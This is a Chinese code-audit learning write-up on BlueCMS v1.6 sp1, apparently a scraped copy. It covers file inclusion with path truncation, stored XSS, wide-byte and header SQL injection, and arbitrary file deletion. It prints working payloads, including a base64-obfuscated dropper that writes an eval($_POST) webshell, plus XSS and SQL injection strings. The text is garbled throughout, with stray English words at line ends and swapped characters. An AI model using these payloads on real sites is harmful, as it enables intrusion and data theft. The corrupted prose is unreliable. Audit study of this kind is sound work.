bluecms v1.6 sp1 代码审计学习
前言
正式开始代码审计的学习,拓宽本身的知识面。代码审计学习的动力也是来自团队里的王叹之师傅,向王叹之师傅学习。javascript
这里参考了一些前辈,师傅的复现经验和bluecms审计的心得php
安装
install.phphtml
搭建完成java
seay自动审计
文件包含漏洞
/user.phpmysql
742-751行web
elseif ($act == 'pay'){ include 'data/pay.cache.php'; $price = $_POST['price']; $id = $_POST['id']; $name = $_POST['name']; if (empty($_POST['pay'])) { showmsg('对不起,您没有选择支付方式'); } include 'include/payment/'.$_POST['pay']."/index.php"; }
这里直接包含postsql
这里咱们先注册一个用户shell
帐号test 密码test123,进入user.php页面数据库
追踪下act变量windows
act对应的一些操做模式,好比登录,删除,修改我的资料,对应的模式。这里购买一张便民卡,而后选择支付。抓包
这里咱们能够经过post传参pay控制文件包含的路径,可是后面拼接了/index.php
有两种方法能够截断:
方法1:
绕过方法1:%00 截断 条件:magic_quotes_gpc = Off PHP 版本<5.3.4 测试:?filename=../../../../../../boot.ini%00
方法2:
绕过方法2:路径长度截断
条件:windows下目录路径最大长度为256字节,超出部分将丢弃;
Linux下目录最大长度为4096字节,超出长度将丢弃
测试:?filename=text.txt././././. 或?filename=test.txt.....
这里能够用pay=../../phpi.txt.........(省略.)绕过,能够在windows本地尝试建立一个test.txt...........(省略.),能够发现最后文件名仍是test.txt
这里能够利用windows的路径特性来截断=>Windows的路径不能超过256个字符
参考=>http://www.javashuo.com/article/p-rwjymdhu-cd.html
而且这里为了验证,我在根目录放置了phpi.txt文件
<?php phpinfo();
发现并无包含,截断失败
经过joychou师傅的文章发现也是有版本限制的。
phpstudy修改为5.3.29继续尝试=>仍然没法利用。继续下降版本至5.2.17
这时候发现能够成功包含。
我的资料中能够上传我的头像
查看下路径
文件包含图片马
看师傅们的文章中还有一种方法就是包含从新写入一个马
<?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?>
由于这样包含的shell,用菜刀或者蚁剑管理起来,参数很麻烦,不如直接包含写马的操做。学习到了。
XSS漏洞
发布新闻
黑盒测试,我的资料中,有一处本地新闻,能够发布新闻和管理新闻。
可是这里不能选择新闻分类,咱们用管理员进入/admin后台发布下栏目分类
查看新闻,发现没有弹框,编辑html元素查看,已经转义实体化了
经过 burp抓包再结合白盒审计
$title = !empty($_POST['title']) ? htmlspecialchars(trim($_POST['title'])) : ''; $color = !empty($_POST['color']) ? htmlspecialchars(trim($_POST['color'])) : ''; $cid = !empty($_POST['cid']) ? intval($_POST['cid']) : ''; if(empty($cid)){ showmsg('新闻分类不能为空'); } $author = !empty($_POST['author']) ? htmlspecialchars(trim($_POST['author'])) : $_SESSION['admin_name']; $source = !empty($_POST['source']) ? htmlspecialchars(trim($_POST['source'])) : ''; $content = !empty($_POST['content']) ? filter_data($_POST['content']) : ''; $descript = !empty($_POST['descript']) ? mb_substr($_POST['descript'], 0, 90) : mb_substr(html2text($_POST['content']),0, 90); if(isset($_FILES['lit_pic']['error']) && $_FILES['lit_pic']['error'] == 0){ $lit_pic = $image->img_upload($_FILES['lit_pic'],'lit_pic');
发现title=>标题,color=>颜色,author=>做者,source=>来源,都使用了htmlspecialchars转义(第二个参数若是是默认的话,是不转义单引号的)
这里能够从content下手,也就是新闻内容。定位下filter_data函数
function filter_data($str) { $str = preg_replace("/<(\/?)(script|i?frame|meta|link)(\s*)[^<]*>/", "", $str); return $str; }
过滤了script,iframe,frame,meta,link等
这里能够用a,img标签等绕过
这里必需要抓包,这里自动转义了下。修改成原来的
<a href=javascript:alert(1)>yunying</a>
点击连接,弹框。而且这是存储型的
再把payload修改为
<img src=1 onerror=alert(1)>
再去看了下评论功能是否存在
通过了转义。
用户注册
写完后去对了下不少师傅的审计记录,发现帐户注册存在xss。
直接出入不存在过滤
$user_name = !empty($_POST['user_name']) ? trim($_POST['user_name']) : ''; $pwd = !empty($_POST['pwd']) ? trim($_POST['pwd']) : ''; $pwd1 = !empty($_POST['pwd1']) ? trim($_POST['pwd1']) : ''; $email = !empty($_POST['email']) ? trim($_POST['email']) : ''; $safecode = !empty($_POST['safecode']) ? trim($_POST['safecode']) : '';
这里用户名有长度限制,用邮箱打能够实现存储xss
SQL注入
ad_js.php
12-19行
$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : ''; if(empty($ad_id)) { echo 'Error!'; exit(); } $ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);
这里没有引号保护,直接带入,除了trim去掉两边空格,没有任何的过滤。
能够直接带入查询
$db跟踪,来自于包含的/include/common.inc.php
创建数据库链接的一句话
getone是mysql类的中的方法,简单的查询
并且在定义mysql类的mysq.class.php中
设置了GBK编码
而且有回显。输出的方式是这样的
输出的ad_content,看一下ad_content在哪里,对于end_time,可能赋值为exp_content字段,也多是content,咱们用phpmyadmin登录查看
在第六列和第七列都插入注入数据
用户注册
看了下王叹之师傅的博客,发现用户注册的那里不只能够xss,insert into也能够进行宽字节注入。
%df',1,1),(100,0x6162717765,md5(123456),(select database()),1,1)#
后台登录
后台登录也存在宽字节注入,在/admin/login.php中存在check_admin,检查是不是admin的函数
function check_admin($name, $pwd) { global $db; $row = $db->getone("SELECT COUNT(*) AS num FROM ".table('admin')." WHERE admin_name='$name' and pwd = md5('$pwd')"); if($row['num'] > 0) { return true; } else { return false; } }
直接带入,可是包含了/admin/include/common.inc.php
if(!get_magic_quotes_gpc()) { $_POST = deep_addslashes($_POST); $_GET = deep_addslashes($_GET); $_COOKIES = deep_addslashes($_COOKIES); $_REQUEST = deep_addslashes($_REQUEST); }
这里是通过转义的,并且开了GBK,就存在宽字节注入了。在/admin/login.php注入
当我输入以下payload
自动对'进行了转义,更能证实了存在宽字节注入
正确payload:
留言板(XFF头注入)
/comment.php
咱们全文追踪getip函数
发现有插入的数据,这里也跟上面的同样,在评论处comment.php存在插入ip到数据库。
再查看有没有调用online_ip的地方
/guest_book.php
guest_book.php是留言列表,而comment.php是发表新闻下的评论
这里就实验下guest_book.php
闭合 ' 和 )
还有一些没有过滤直接拼接的在admin页面,后台中。这里就不赘述了,能够看下王叹之师傅的博客。
任意文件删除
/user.php
if (!empty($_POST['face_pic1'])){ if (strpos($_POST['face_pic1'], 'http://') != false && strpos($_POST['face_pic1'], 'https://') != false){ showmsg('只支持本站相对路径地址'); } else{ $face_pic = trim($_POST['face_pic1']); } }else{ if(file_exists(BLUE_ROOT.$_POST['face_pic3'])){ @unlink(BLUE_ROOT.$_POST['face_pic3']); } }
face_pic1是用户头像,face_pic3是一个隐藏的表单值。调用unlink能够达到删除任意文件
好比删除robots.txt
抓包修改
在user.php页面继续查找unlink函数
elseif ($act == 'del_news') { if (empty($_GET['id'])) { return false; } $news = $db->getone("SELECT user_id, lit_pic FROM ".table('article')." WHERE id=".intval($_GET['id'])); if ($_SESSION['user_id'] != $news['user_id']) { showmsg('对不起,您没有权限删除这条新闻', 'user.php?act=news_manage'); } $sql = "DELETE FROM ".table('article')." WHERE id=".intval($_GET['id']); $db->query($sql); if (file_exists(BLUE_ROOT.$news['lit_pic'])) { @unlink(BLUE_ROOT.$news['list_pic']); } showmsg('删除一条本地新闻成功', 'user.php?act=news_manage');
这里实验发现不能够,由于有查询数据库操做,删除的是根据数据库中保存的路径。
继续查看
发现act=do_info_edit中存在任意文件删除漏洞
不过须要绕过一些验证,exp以下:
已经把phpi.txt删除
在/admin/article中也能够看到一摸同样的操做,也是任意文件删除。
对于文件删除漏洞,这里根据https://www.anquanke.com/post/id/156850/给出一些建议
- 统一文件夹存放
- 数据库记录存储路径
- 对于入库记录进行严格的防注入和文件上传检测,采用白名单方式来检查后缀,黑名单过滤上跳等操做,严格作到数据库与文件同步
- 能用云存储就用,实在不能用在本身写
- 尽可能少的使用文件删除功能
还有不少没有写出来的,这里就不一一列举了,用seay能够发现大量的漏洞提示,可是仍是须要本身去一一验证。
说一下下一个cms怎么审计:
1:首先不能盲目,记住Web漏洞的本质:存在用户的输入
应重点关注有输入点的页面,再去文件里找相关代码,不断回溯看看代码中有没有可控变量,过滤是否严谨。
2:能够全局搜索一下危险函数,如:unlink,include,move_uploaded_file函数等
查找相关漏洞能够去找关键字,如sql注入:
全局搜索一下SELECT、UPDATE、INSERT、DELETE等关键字
看看是否有预编译后再插入数据库。
好比上传,能够搜索一下upload,看看他的过滤规则。
多总结,多反思,先审计完再看网上文章,看看别的师傅怎么审计的,不断借鉴。--> https://www.cnblogs.com/wangtanzhi/p/12302978.html#autoid-0-2-0
- 1. [php代码审计]bluecms v1.6 sp1
- 2. BlueCMS v1.6 sp1 漏洞复现
- 3. 代码审计—Bluecms—sql—admin/category.php(无)
- 4. 代码审计—Bluecms—sql—comment.php(无)
- 5. 代码审计—Bluecms—xss—admin/card.php(反射)
- 6. Bluecms 代码审计,入门级别
- 7. 代码审计—Bluecms—sql—index.php(无)
- 8. BlueCms 1.6代码审计之Union 注入
- 9. 代码审计—Bluecms—sql—search.php(无)
- 10. 代码审计—Bluecms—sql—ann.php(无)
- 更多相关文章...
- • Markdown 代码 - Markdown 教程
- • Eclipse 代码模板 - Eclipse 教程
- • Tomcat学习笔记(史上最全tomcat学习笔记)
- • IntelliJ IDEA代码格式化设置
-
每一个你不满意的现在,都有一个你没有努力的曾经。
- 1. [php代码审计]bluecms v1.6 sp1
- 2. BlueCMS v1.6 sp1 漏洞复现
- 3. 代码审计—Bluecms—sql—admin/category.php(无)
- 4. 代码审计—Bluecms—sql—comment.php(无)
- 5. 代码审计—Bluecms—xss—admin/card.php(反射)
- 6. Bluecms 代码审计,入门级别
- 7. 代码审计—Bluecms—sql—index.php(无)
- 8. BlueCms 1.6代码审计之Union 注入
- 9. 代码审计—Bluecms—sql—search.php(无)
- 10. 代码审计—Bluecms—sql—ann.php(无)